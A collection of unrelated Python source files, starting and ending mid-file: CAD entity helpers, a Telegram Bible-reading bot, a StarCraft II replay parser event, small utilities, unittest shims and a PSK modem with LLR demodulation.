"""Rotate entity inplace about z-axis, returns `self`
(floating interface).
Args:
angle: rotation angle in radians
"""
return self.transform(Matrix44.z_rotate(angle))
def has_hyperlink(self) -> bool:
"""Returns ``True`` if entity has an attached hyperlink."""
return bool(self.xdata) and ("PE_URL" in self.xdata) # type: ignore
def set_hyperlink(
self, link: str, description: str = None, location: str = None
):
"""Set hyperlink of an entity."""
xdata = [(1001, "PE_URL"), (1000, str(link))]
if description:
xdata.append((1002, "{"))
xdata.append((1000, str(description)))
if location:
xdata.append((1000, str(location)))
xdata.append((1002, "}"))
self.discard_xdata("PE_URL")
self.set_xdata("PE_URL", xdata)
if self.doc and "PE_URL" not in self.doc.appids:
self.doc.appids.new("PE_URL")
return self
def get_hyperlink(self) -> Tuple[str, str, str]:
"""Returns hyperlink, description and location."""
link = ""
description = ""
location = ""
if self.xdata and "PE_URL" in self.xdata:
xdata = [
tag.value
for tag in self.get_xdata("PE_URL")
if tag.code == 1000
]
if len(xdata):
link = xdata[0]
if len(xdata) > 1:
description = xdata[1]
if len(xdata) > 2:
location = xdata[2]
return link, description, location
def remove_dependencies(self, other: "Drawing" = None) -> None:
"""Remove all dependencies from current document.
(internal API)
"""
if not self.is_alive:
return
super().remove_dependencies(other)
# The layer attribute is preserved because layer doesn't need a layer
# table entry, the layer attributes are reset to default attributes
# like color is 7 and linetype is CONTINUOUS
has_linetype = other is not None and (
self.dxf.linetype in other.linetypes
)
if not has_linetype:
self.dxf.linetype = "BYLAYER"
self.dxf.discard("material_handle")
self.dxf.discard("visualstyle_handle")
self.dxf.discard("plotstyle_enum")
self.dxf.discard("plotstyle_handle")
def _new_compound_entity(
self, type_: str, dxfattribs: dict
) -> "DXFGraphic":
"""Create and bind new entity with same layout settings as `self`.
Used by INSERT & POLYLINE to create appended DXF entities, don't use it
to create new standalone entities.
(internal API)
"""
dxfattribs = dxfattribs or {}
# if layer is not deliberately set, set same layer as creator entity,
# at least VERTEX should have the same layer as the POLYGON entity.
# Don't know if that is also important for the ATTRIB & INSERT entity.
if "layer" not in dxfattribs:
dxfattribs["layer"] = self.dxf.layer
if self.doc:
entity = factory.create_db_entry(type_, dxfattribs, self.doc)
else:
entity = factory.new(type_, dxfattribs)
entity.dxf.owner = self.dxf.owner
entity.dxf.paperspace = self.dxf.paperspace
return entity # type: ignore
@factory.register_entity
class SeqEnd(DXFGraphic):
DXFTYPE = "SEQEND"
def add_entity(entity: DXFGraphic, layout: "BaseLayout") -> None:
"""Add `entity` entity to the entity database and to the given `layout`."""
assert entity.dxf.handle is None
assert layout is not None
if layout.doc:
factory.bind(entity, layout.doc)
layout.add_entity(entity)
def replace_entity(
source: DXFGraphic, target: DXFGraphic, layout: "BaseLayout"
) -> None:
"""Add `target` entity to the entity database and to the given `layout`
and replace the `source` entity by the `target` entity.
"""
assert target.dxf.handle is None
assert layout is not None
target.dxf.handle = source.dxf.handle
if source in layout:
layout.delete_entity(source)
if layout.doc:
factory.bind(target, layout.doc)
layout.add_entity(target)
else:
source.destroy()
def is_graphic_entity(entity: DXFEntity) -> bool:
"""Returns ``True`` if the `entity` has a graphical representations and
can reside in the model space, a paper space or a block layout,
otherwise the entity is a table or class entry or a DXF object from the
OBJECTS section.
"""
if isinstance(entity, DXFGraphic):
return True
if isinstance(entity, DXFTagStorage) and entity.is_graphic_entity:
return True
return False
|
"""
MIT License
Copyright (c) 2020 Camilo A. Cáceres
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import Bible
import Database_control
import telebot
from telebot import types
from difflib import SequenceMatcher
import numpy as np
from googletrans import Translator
import configparser
import time
import logging as log
########################################################################
###################### Constants ######################
########################################################################
# Telegram TOKEN
config = configparser.RawConfigParser()
config.read('config.txt')
TOKEN = dict(config.items('DEFAULT'))['bot_token']
#create a new Telegram Bot object
bot = telebot.TeleBot(TOKEN)
# command description used in the "help" command
commands = {
'start' : '☝ Know what can I do',
'send_chapter' : '📧 Send now the chapter to read',
'verse' : '⛪ Request a Bible passage',
'information' : '📒 Know your information and settings for this bot',
'help' : '❔ Gives you information about the available commands',
'subscribe' : '📚 Receive 1 Bible chapter every day at a given time or Cancel it',
'language' : '🌎 Select your preferred language',
'choose_book' : '📖 Select the current bible book you are reading',
'choose_chapter' : '📑 Select the current chapter you want to start reading',
'bible_version' : '📕 Select the bible version'
}
########################################################################
###################### LANGUAGES ######################
########################################################################
# Translator constructor
translator = Translator()
# Available Languages and Versions in the API
f = open("languages_api.txt", "r")
bible_api_list = []
for x in f:
bible_api_list.append(x[4:])
dict_api_version={}
languages_api=[]
for each_language in bible_api_list:
language = each_language.split(":")[0]
languages_api.append(language)
dict_api_version[language]=[]
acronyms_api=[]
version_api=[]
for each in bible_api_list:
language = each.split(":")[0]
acronym= each.split("(")[-1].split(")")[0]
version= each.split(":")[1].split(acronym)[0][:-1]
acronyms_api.append(acronym)
version_api.append(version)
dict_api_version[language].append(version)
dict_api_ver2acr = dict(zip(version_api, acronyms_api))
dict_api_acr2ver = dict(zip(acronyms_api, version_api))
unique_languages_api = set(languages_api)
# Available translation languages
f = open("language_translate.txt", "r")
languages_translation = []
for each in f:
languages_translation.append(each.split("\n")[0])
# Languages comparison
languages_translation_set = set(languages_translation)
lang_ver_transl = languages_translation_set.intersection(unique_languages_api)
lang_transl = languages_translation_set.difference(unique_languages_api)
########################################################################
################ SUPPORT FUNCTIONS ###################
########################################################################
def verify_language(language_input, lang_ver_transl=list(lang_ver_transl), lang_transl=list(lang_transl)):
'''
'''
similarity_vec=[]
languages = lang_transl + lang_ver_transl
language_input = translator.translate(language_input, dest='english').text
for each in languages:
similarity_vec.append(Bible.similar(language_input,each))
return languages[np.argmax(similarity_vec)]
def verify_version(version_input, versions=list(dict_api_ver2acr.keys())):
'''
'''
similarity_vec=[]
for each in versions:
similarity_vec.append(Bible.similar(version_input,each))
return versions[np.argmax(similarity_vec)]
def send_translated_message(id, text, language="English"):
'''
'''
try:
if language == "English":
bot.send_message(id, text)
else:
text = Bible.translate_message(text, language=language, src="English")
text = text.replace("/ ","/")
bot.send_message(id, text)
except:
print("Connection Error")
# DO NOT try to send the daily verse or any service if the user blocked the bot
#send_translated_message(id, text, language)
########################################################################
################ ACTION FUNCTIONS ###################
########################################################################
# start page
@bot.message_handler(commands=['start'])
def command_start(m):
id = m.chat.id
name = m.chat.first_name
connection, cursor = Database_control.create_db()
verify_id = Database_control.verify_id(cursor, id)
if verify_id == False:
Database_control.add_user(connection, cursor, id, name)
language = Database_control.get_language(cursor, id)
Database_control.close_db(connection)
start_text="☝ This bot is a free service for educational purposes \nThis bot 🤖 can: \n\t1. Send you daily 1 chapter of the Bible in a sequence ('/subscribe') \n\t2. If you are not subscribed or want to advance more, you can manually request the chapter ('/send_chapter'). \n\t3.❓ Also you can ask for any verse or passage ('/verse') \n\nGo to help ('/help') for more information"
send_translated_message(m.chat.id, start_text, language) # Send start text
show_mainkeyboard(m)
# send_chapter page
@bot.message_handler(commands=['send_chapter'])
def command_send_chapter(m):
id = m.chat.id
connection, cursor = Database_control.create_db()
book = Database_control.get_book(cursor, id)
origin_language = Database_control.get_language(cursor, id)
chapter = Database_control.get_chapter(cursor, id)
bible_version = Database_control.get_bible_version(cursor, id)
language = Database_control.get_language(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
if verify_id:
send_translated_message(id, "Sending chapter ...", language)
message = " ".join([book, str(chapter)])
try:
if origin_language in lang_ver_transl:
n_message = message
response = Bible.get_message(n_message, bible_version)
else:
n_message = Bible.translate_message(message, language="English", src=origin_language)
response = Bible.get_message(n_message, bible_version)
response = Bible.translate_message(response, origin_language)
except:
response = "Error - please retry"
send_translated_message(id, n_message, language)
response = [i for i in telebot.util.split_string(response, 3000)]
for each_message in response:
send_translated_message(id,each_message, language)
next_chapter = Bible.get_next_chapter(message)
next_book = next_chapter.split(" ")[0]
next_chapter = next_chapter.split(" ")[1]
Database_control.set_book(connection, cursor, next_book, id)
Database_control.set_chapter(connection, cursor, next_chapter, id)
Database_control.set_mod_default(connection, cursor, id)
Database_control.close_db(connection)
show_mainkeyboard(m)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
Database_control.close_db(connection)
command_start(m)
def command_send_chapter_crontab(id):
connection, cursor = Database_control.create_db()
book = Database_control.get_book(cursor, id)
origin_language = Database_control.get_language(cursor, id)
chapter = Database_control.get_chapter(cursor, id)
bible_version = Database_control.get_bible_version(cursor, id)
language = Database_control.get_language(cursor, id)
send_translated_message(id, "Sending daily chapter", language)
message = " ".join([book, str(chapter)])
try:
if origin_language in lang_ver_transl:
n_message = message
response = Bible.get_message(n_message, bible_version)
else:
n_message = Bible.translate_message(message, language="English", src=origin_language)
response = Bible.get_message(n_message, bible_version)
response = Bible.translate_message(response, origin_language)
except:
response = "Error - please retry"
response = [i for i in telebot.util.split_string(response, 3000)]
send_translated_message(id, n_message, language)
for each_message in response:
send_translated_message(id,each_message, language)
next_chapter = Bible.get_next_chapter(message)
next_book = next_chapter.split(" ")[0]
next_chapter = next_chapter.split(" ")[1]
Database_control.set_book(connection, cursor, next_book, id)
Database_control.set_chapter(connection, cursor, next_chapter, id)
Database_control.set_mod_default(connection, cursor, id)
Database_control.close_db(connection)
# set verse page
@bot.message_handler(commands=['verse'])
def command_verse(m):
command_hide(m)
id = m.chat.id
connection, cursor = Database_control.create_db()
Database_control.set_verse(connection, cursor, id)
language = Database_control.get_language(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
Database_control.close_db(connection)
if verify_id:
send_translated_message(id, "Type the desired passage", language)
Example = "Examples: \nJohn 14:6 \nGenesis 2:1-4 \nLuke 3"
send_translated_message(id, Example, language)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
command_start(m)
# information page
@bot.message_handler(commands=['information'])
def command_information(m):
id = m.chat.id
connection, cursor = Database_control.create_db()
status = Database_control.get_status(cursor, id)
language = Database_control.get_language(cursor, id)
book = Database_control.get_book(cursor, id)
chapter = Database_control.get_chapter(cursor, id)
bible_version = Database_control.get_bible_version(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
Database_control.close_db(connection)
if verify_id:
# Full version name (no acronym)
try:
bible_version = dict_api_acr2ver[bible_version]
except:
bible_version = bible_version
if status==1:
status='✅'
else:
status='❌'
info_text = "📒 Information \n📚 Subscribed: \t"+status+"\n🌎 Language: \t"+str(language)+"\n📖 Current Bible Book: \t"+str(book)+"\n📑 Current Chapter: \t"+str(chapter)+"\n📕 Current Bible Version: \t"+str(bible_version)
send_translated_message(m.chat.id, info_text, language) # Send info text
show_mainkeyboard(m)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
command_start(m)
# help page
@bot.message_handler(commands=['help'])
def command_help(m):
id = m.chat.id
connection, cursor = Database_control.create_db()
language = Database_control.get_language(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
Database_control.close_db(connection)
if verify_id:
help_text = "Avaliable commands: \n\n"
for key in commands: # generate help text out of the commands dictionary defined at the top
help_text += "/" + key + ": " + commands[key] + "\n"
send_translated_message(id, help_text, language) # send the generated help page
show_mainkeyboard(m)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
command_start(m)
def show_mainkeyboard(m):
start_markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=False)
for each in range(0,len(list(commands.keys()))):
start_markup.row("/"+list(commands.keys())[each])
start_markup.row("/hide_keyboard")
bot.send_message(m.from_user.id, "⌨️❔", reply_markup=start_markup)
# Hide keyboard
@bot.message_handler(commands=['hide_keyboard'])
def command_hide(message):
# bot.send_chat_action(id, 'typing')
hide_markup = telebot.types.ReplyKeyboardRemove()
bot.send_message(message.chat.id, "⌨💤...", reply_markup=hide_markup)
# subscribe/ unsubscribe
@bot.message_handler(commands=['subscribe'])
def command_subscribe(m):
id = m.chat.id
connection, cursor = Database_control.create_db()
current_status = Database_control.get_status(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
if verify_id:
if current_status==1:
new_status=0
else:
new_status=1
Database_control.set_status(connection, cursor, new_status, id)
language = Database_control.get_language(cursor, id)
Database_control.close_db(connection)
if new_status==1:
status='✅'
else:
status='❌'
text = "Subscription: \t"+status
send_translated_message(id, text, language) # send the generated text
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
Database_control.close_db(connection)
command_start(m)
# set language page
@bot.message_handler(commands=['language'])
def command_language(m):
command_hide(m)
id = m.chat.id
connection, cursor = Database_control.create_db()
Database_control.set_mod_language(connection, cursor, id)
language = Database_control.get_language(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
Database_control.close_db(connection)
if verify_id:
send_translated_message(id, "Type your new language", language)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
command_start(m)
# set book page
@bot.message_handler(commands=['choose_book'])
def command_book(m):
command_hide(m)
id = m.chat.id
connection, cursor = Database_control.create_db()
Database_control.set_mod_book(connection, cursor, id)
language = Database_control.get_language(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
Database_control.close_db(connection)
if verify_id:
send_translated_message(id, "Type the desired bible book", language)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
command_start(m)
# set current chapter
@bot.message_handler(commands=['choose_chapter'])
def command_chapter(m):
command_hide(m)
id = m.chat.id
connection, cursor = Database_control.create_db()
Database_control.set_mod_chapter(connection, cursor, id)
language = Database_control.get_language(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
Database_control.close_db(connection)
if verify_id:
send_translated_message(id, "Type the number of the desired chapter to start with", language)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
command_start(m)
@bot.message_handler(commands=['bible_version'])
def command_bible_version(m):
command_hide(m)
id = m.chat.id
connection, cursor = Database_control.create_db()
Database_control.set_mod_bible_version(connection, cursor, id)
language = Database_control.get_language(cursor, id)
verify_id = Database_control.verify_id(cursor, id)
if verify_id:
if language in dict_api_version.keys():
versions = dict_api_version[language] + dict_api_version["English"]
else:
versions = dict_api_version["English"]
version_markup = types.ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=False)
for each in range(0,len(versions)):
version_markup.row(versions[each])
Database_control.set_mod_default(connection, cursor, id)
Database_control.set_mod_bible_version(connection, cursor, id)
Database_control.close_db(connection)
bot.send_message(m.from_user.id, "⌨️", reply_markup=version_markup)
else:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
Database_control.close_db(connection)
command_start(m)
# default handler for every other text
@bot.message_handler(func=lambda message: True, content_types=['text'])
def command_default(m):
id = m.chat.id
connection, cursor = Database_control.create_db()
if Database_control.verify_id(cursor, id) == False:
send_translated_message(m.chat.id, "You are a new user. Check what I can do at /start")
Database_control.close_db(connection)
command_start(m)
else:
# TODO - put all in a tuple instead single queries - optimize db queries
lang_selection = Database_control.get_mod_language(cursor, id)
bible_book_selection = Database_control.get_mod_book(cursor, id)
chapter_selection = Database_control.get_mod_chapter(cursor, id)
bible_version_selection = Database_control.get_mod_bible_version(cursor, id)
verse = Database_control.get_verse(cursor, id)
origin_language = Database_control.get_language(cursor, id)
bible_version = Database_control.get_bible_version(cursor, id)
if lang_selection == True:
language = verify_language(m.text)
Database_control.set_language(connection, cursor, language, id)
Database_control.set_mod_language(connection, cursor, id)
if language in dict_api_version.keys():
Database_control.set_bible_version(connection, cursor, dict_api_ver2acr[dict_api_version[language][0]], id)
else:
Database_control.set_bible_version(connection, cursor, 'akjv', id)
send_translated_message(m.chat.id, "The selected language is "+ language, origin_language)
Database_control.set_mod_default(connection, cursor, id)
Database_control.close_db(connection)
show_mainkeyboard(m)
elif verse == True:
send_translated_message(id, "Accepted request - Searching ...", origin_language)
message = m.text
try:
if origin_language in lang_ver_transl:
if origin_language != 'English':
n_message = Bible.translate_message(message, language="English", src=origin_language)
else:
n_message = message
if n_message.split(":")[-1][0] == " ":
n_message = "".join([n_message.split(":")[:-1][0],":","".join(n_message.split(":")[-1][1:].split(" "))])
response = Bible.get_message(n_message, bible_version)
else:
n_message = Bible.translate_message(message, language="English", src=origin_language)
if n_message.split(":")[-1][0] == " ":
n_message = "".join([n_message.split(":")[:-1][0],":","".join(n_message.split(":")[-1][1:].split(" "))])
response = Bible.get_message(n_message, bible_version)
response = Bible.translate_message(response, origin_language)
Database_control.set_verse(connection, cursor, id)
except:
response = "Error - please retry"
response = [i for i in telebot.util.split_string(response, 3000)]
for each_message in response:
send_translated_message(id, each_message, origin_language)
Database_control.set_mod_default(connection, cursor, id)
Database_control.close_db(connection)
show_mainkeyboard(m)
elif bible_book_selection == True:
message = m.text
command_hide(m)
if origin_language in (list(lang_ver_transl)+list(lang_transl)):
if origin_language != 'English':
n_message = Bible.translate_message(message, language="English", src=origin_language)
else:
n_message = message
book = Bible.verify_book(n_message)
else:
send_translated_message(m.chat.id, "As your language is not available, please write in English", origin_language)
n_message = message
book = Bible.verify_book(n_message)
Database_control.set_book(connection, cursor, book, id)
Database_control.set_mod_book(connection, cursor, id)
Database_control.set_mod_default(connection, cursor, id)
send_translated_message(m.chat.id, "The selected Book is "+ book, origin_language)
Database_control.close_db(connection)
show_mainkeyboard(m)
elif chapter_selection == True:
message = m.text
book = Database_control.get_book(cursor, id)
if message.isnumeric():
if (Bible.verify_book_chapter(book, message) == True) and (int(message) >= 1):
Database_control.set_chapter(connection, cursor, message, id)
send_translated_message(m.chat.id, "The selected chapter is "+ message, origin_language)
else:
send_translated_message(m.chat.id, "This chapter doesn't exist for the book of "+book+". \nChapter 1 selected.", origin_language)
message = "1"
Database_control.set_chapter(connection, cursor, "1", id)
else:
message = "1"
send_translated_message(m.chat.id, "This is not a number. \nChapter 1 selected.", origin_language)
Database_control.set_chapter(connection, cursor, "1", id)
Database_control.set_mod_book(connection, cursor, id)
Database_control.set_mod_default(connection, cursor, id)
Database_control.close_db(connection)
show_mainkeyboard(m)
elif bible_version_selection == True:
message = m.text
command_hide(m)
version = verify_version(message)
acr = dict_api_ver2acr[version]
Database_control.set_bible_version(connection, cursor, acr, id)
Database_control.set_mod_default(connection, cursor, id)
Database_control.close_db(connection)
show_mainkeyboard(m)
else:
send_translated_message(m.chat.id, "I don't understand. \nTry the help page at '/help'", origin_language)
Database_control.set_mod_default(connection, cursor, id)
Database_control.close_db(connection)
show_mainkeyboard(m)
Database_control.close_db(connection)
########################################################################
################ MAIN FUNCTION ##################
########################################################################
#telebot.apihelper.READ_TIMEOUT = 1
if __name__ == "__main__":
# bot.polling(none_stop=True, timeout=30)
while True:
try:
log.info('Starting bot')
bot.polling(none_stop=True, timeout=30)
except Exception as err:
log.error("Bot polling error: {0}".format(err.args))
bot.stop_polling()
time.sleep(60)
|
from zephyrus_sc2_parser.events.base_event import BaseEvent
from zephyrus_sc2_parser.game.perception_action_cycle import PerceptionActionCycle
class CameraUpdateEvent(BaseEvent):
def __init__(self, *args):
super().__init__(*args)
def parse_event(self):
if self.event['m_target']:
player = self.player
position = (self.event['m_target']['x']/256, self.event['m_target']['y']/256)
gameloop = self.event['_gameloop']
if not player:
return
if not player.prev_screen_position:
player.prev_screen_position = position
else:
x_diff = player.prev_screen_position[0] - position[0]
y_diff = player.prev_screen_position[1] - position[1]
# if x^2 + y^2 > 15^2 then add screen
# 15 tiles is cut off
if (x_diff**2) + (y_diff**2) >= 225:
player.screens.append(gameloop)
player.prev_screen_position = position
if player.current_pac:
current_pac = player.current_pac
# If current PAC is still within camera bounds, count action
if current_pac.check_position(position):
current_pac.camera_moves.append((gameloop, position))
# If current PAC is out of camera bounds
# and meets min duration, save it
elif current_pac.check_duration(gameloop):
current_pac.final_camera_position = position
current_pac.final_gameloop = gameloop
if current_pac.actions:
player.pac_list.append(current_pac)
player.current_pac = PerceptionActionCycle(position, gameloop)
player.current_pac.camera_moves.append((gameloop, position))
# If current PAC is out of camera bounds
# and does not meet min duration,
# discard current PAC and create new one
else:
player.current_pac = PerceptionActionCycle(position, gameloop)
player.current_pac.camera_moves.append((gameloop, position))
else:
player.current_pac = PerceptionActionCycle(position, gameloop)
player.current_pac.camera_moves.append((gameloop, position))
|
import pandas as pd
def clean_dict_cols(df, cols, key='$'):
df = df.copy()
for c in cols:
df[c] = df[c].apply(lambda x: x.get(key) if isinstance(x, dict) else x)
return df
|
from setuptools import setup
from rak_net import __version__
requirements = [
'binary-utils',
]
extras_require = {
'docs': [
'sphinx',
'sphinx-rtd-theme',
],
}
packages = [
'rak_net',
]
with open('README.rst') as f:
readme = f.read()
setup(
name='aio-rak-net',
author='L0RD-ZER0',
url='',
version=__version__,
license='MIT',
description='Async Rak-Net',
long_description=readme,
long_description_content_type="text/x-rst",
install_requires=requirements,
extras_require=extras_require,
packages=packages,
)
|
#Write your code below this line 👇
print(len(input())) |
import re
import unittest
def assertIn(self, member, container, msg=None):
"""Just like self.assertTrue(a in b), but with a nicer default message."""
if member not in container:
if not msg:
msg = '%r not found in %r' % (member, container)
self.fail(msg)
unittest.TestCase.assertIn = assertIn
def assertNotIn(self, member, container, msg=None):
"""Just like self.assertTrue(a not in b), but with a nicer default message."""
if member in container:
if not msg:
msg = '%s unexpectedly found in %s' % (member,
container)
self.fail(msg)
unittest.TestCase.assertNotIn = assertNotIn
def assertGreater(self, a, b, msg=None):
"""Just like self.assertTrue(a > b), but with a nicer default message."""
if not a > b:
if not msg:
msg = '%s not greater than %s' % (a, b)
self.fail(msg)
unittest.TestCase.assertGreater = assertGreater
def assertRegexpMatches(self, text, expected_regexp, msg=None):
"""Fail the test unless the text matches the regular expression."""
if isinstance(expected_regexp, basestring):
expected_regexp = re.compile(expected_regexp)
if not expected_regexp.search(text):
msg = msg or "Regexp didn't match"
msg = '%s: %r not found in %r' % (msg, expected_regexp.pattern, text)
raise self.failureException(msg)
unittest.TestCase.assertRegex = assertRegexpMatches
def assertNotRegexpMatches(self, text, unexpected_regexp, msg=None):
"""Fail the test if the text matches the regular expression."""
if isinstance(unexpected_regexp, basestring):
unexpected_regexp = re.compile(unexpected_regexp)
match = unexpected_regexp.search(text)
if match:
msg = msg or "Regexp matched"
msg = '%s: %r matches %r in %r' % (msg,
text[match.start():match.end()],
unexpected_regexp.pattern,
text)
raise self.failureException(msg)
unittest.TestCase.assertNotRegex = assertNotRegexpMatches
def assertIsInstance(self, obj, cls, msg=None):
"""Same as self.assertTrue(isinstance(obj, cls)), with a nicer
default message."""
if not isinstance(obj, cls):
if not msg:
msg = '%s is not an instance of %r' % (obj, cls)
self.fail(msg)
unittest.TestCase.assertIsInstance = assertIsInstance
|
# coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
class Modem:
def __init__(self, M, gray_map=True, bin_input=True, soft_decision=True, bin_output=True):
N = np.log2(M) # bits per symbol
if N != np.round(N):
raise ValueError("M should be 2**n, with n=1, 2, 3...")
if soft_decision == True and bin_output == False:
raise ValueError("Non-binary output is available only for hard decision")
self.M = M # modulation order
self.N = int(N) # bits per symbol
self.m = [i for i in range(self.M)]
self.gray_map = gray_map
self.bin_input = bin_input
self.soft_decision = soft_decision
self.bin_output = bin_output
''' SERVING METHODS '''
def __gray_encoding(self, dec_in):
""" Encodes values by Gray encoding rule.
Parameters
----------
dec_in : list of ints
Input sequence of decimals to be encoded by Gray.
Returns
-------
gray_out: list of ints
Output encoded by Gray sequence.
"""
bin_seq = [np.binary_repr(d, width=self.N) for d in dec_in]
gray_out = []
for bin_i in bin_seq:
gray_vals = [str(int(bin_i[idx]) ^ int(bin_i[idx - 1]))
if idx != 0 else bin_i[0]
for idx in range(0, len(bin_i))]
gray_i = "".join(gray_vals)
gray_out.append(int(gray_i, 2))
return gray_out
def create_constellation(self, m, s):
""" Creates signal constellation.
Parameters
----------
m : list of ints
Possible decimal values of the signal constellation (0 ... M-1).
s : list of complex values
Possible coordinates of the signal constellation.
Returns
-------
dict_out: dict
Output dictionary where
key is the bit sequence or decimal value and
value is the complex coordinate.
"""
if self.bin_input == False and self.gray_map == False:
dict_out = {k: v for k, v in zip(m, s)}
elif self.bin_input == False and self.gray_map == True:
mg = self.__gray_encoding(m)
dict_out = {k: v for k, v in zip(mg, s)}
elif self.bin_input == True and self.gray_map == False:
mb = self.de2bin(m)
dict_out = {k: v for k, v in zip(mb, s)}
elif self.bin_input == True and self.gray_map == True:
mg = self.__gray_encoding(m)
mgb = self.de2bin(mg)
dict_out = {k: v for k, v in zip(mgb, s)}
return dict_out
def llr_preparation(self):
""" Creates the coordinates
where either zeros or ones can be placed in the signal constellation..
Returns
-------
zeros : list of lists of complex values
The coordinates where zeros can be placed in the signal constellation.
ones : list of lists of complex values
The coordinates where ones can be placed in the signal constellation.
"""
code_book = self.code_book
zeros = [[] for i in range(self.N)]
ones = [[] for i in range(self.N)]
bin_seq = self.de2bin(self.m)
for bin_idx, bin_symb in enumerate(bin_seq):
if self.bin_input == True:
key = bin_symb
else:
key = bin_idx
for possition, digit in enumerate(bin_symb):
if digit == '0':
zeros[possition].append(code_book[key])
else:
ones[possition].append(code_book[key])
return zeros, ones
''' DEMODULATION ALGORITHMS '''
def __ApproxLLR(self, x, noise_var):
""" Calculates approximate Log-likelihood Ratios (LLRs) [1].
Parameters
----------
x : 1-D ndarray of complex values
Received complex-valued symbols to be demodulated.
noise_var: float
Additive noise variance.
Returns
-------
result: 1-D ndarray of floats
Output LLRs.
Reference:
[1] Viterbi, A. J., "An Intuitive Justification and a
Simplified Implementation of the MAP Decoder for Convolutional Codes,"
IEEE Journal on Selected Areas in Communications,
vol. 16, No. 2, pp 260–264, Feb. 1998
"""
zeros = self.zeros
ones = self.ones
LLR = []
for (zero_i, one_i) in zip(zeros, ones):
num = [((np.real(x) - np.real(z)) ** 2)
+ ((np.imag(x) - np.imag(z)) ** 2)
for z in zero_i]
denum = [((np.real(x) - np.real(o)) ** 2)
+ ((np.imag(x) - np.imag(o)) ** 2)
for o in one_i]
num_post = np.amin(num, axis=0, keepdims=True)
denum_post = np.amin(denum, axis=0, keepdims=True)
llr = np.transpose(num_post[0]) - np.transpose(denum_post[0])
LLR.append(-llr / noise_var)
result = np.zeros((len(x) * len(zeros)))
for i, llr in enumerate(LLR):
result[i::len(zeros)] = llr
return result
''' METHODS TO EXECUTE '''
def modulate(self, msg):
""" Modulates binary or decimal stream.
Parameters
----------
x : 1-D ndarray of ints
Decimal or binary stream to be modulated.
Returns
-------
modulated : 1-D array of complex values
Modulated symbols (signal envelope).
"""
if (self.bin_input == True) and ((len(msg) % self.N) != 0):
raise ValueError("The length of the binary input should be a multiple of log2(M)")
if (self.bin_input == True) and ((max(msg) > 1.) or (min(msg) < 0.)):
raise ValueError("The input values should be 0s or 1s only!")
if (self.bin_input == False) and ((max(msg) > (self.M - 1)) or (min(msg) < 0.)):
raise ValueError("The input values should be in following range: [0, ... M-1]!")
if self.bin_input:
msg = [str(bit) for bit in msg]
splited = ["".join(msg[i:i + self.N])
for i in range(0, len(msg), self.N)] # subsequences of bits
modulated = [self.code_book[s] for s in splited]
else:
modulated = [self.code_book[dec] for dec in msg]
return np.array(modulated)
def demodulate(self, x, noise_var=1.):
""" Demodulates complex symbols.
Yes, MathWorks company provides several algorithms to demodulate
BPSK, QPSK, 8-PSK and other M-PSK modulations in hard output manner:
https://www.mathworks.com/help/comm/ref/mpskdemodulatorbaseband.html
However, to reduce the number of implemented schemes the following way is used in our project:
- calculate LLRs (soft decision)
- map LLR to bits according to the sign of LLR (inverse of NRZ)
We guess the complexity issues are not the critical part due to hard output demodulators are not so popular.
This phenomenon depends on channel decoders properties:
e.g., Convolutional codes, Turbo convolutional codes and LDPC codes work better with LLR.
Parameters
----------
x : 1-D ndarray of complex symbols
Decimal or binary stream to be demodulated.
noise_var: float
Additive noise variance.
Returns
-------
result : 1-D array floats
Demodulated message (LLRs or binary sequence).
"""
if self.soft_decision:
result = self.__ApproxLLR(x, noise_var)
else:
if self.bin_output:
llr = self.__ApproxLLR(x, noise_var)
result = (np.sign(-llr) + 1) / 2 # NRZ-to-bin
else:
llr = self.__ApproxLLR(x, noise_var)
result = self.bin2de((np.sign(-llr) + 1) / 2)
return result
class PSKModem(Modem):
def __init__(self, M, phi=0, gray_map=True, bin_input=True, soft_decision=True, bin_output=True):
super().__init__(M, gray_map, bin_input, soft_decision, bin_output)
self.phi = phi # phase rotation
self.s = list(np.exp(1j * self.phi + 1j * 2 * np.pi * np.array(self.m) / self.M))
self.code_book = self.create_constellation(self.m, self.s)
self.zeros, self.ones = self.llr_preparation()
def de2bin(self, decs):
""" Converts values from decimal to binary representation.
If the input is binary, the conversion from binary to decimal should be done before.
Therefore, this supportive method is implemented.
This method has an additional heuristic:
the bit sequence of "even" modulation schemes (e.g., QPSK) should be read right to left.
Parameters
----------
decs : list of ints
Input decimal values.
Returns
-------
bin_out : list of ints
Output binary sequences.
"""
if self.N % 2 == 0:
bin_out = [np.binary_repr(d, width=self.N)[::-1]
for d in decs]
else:
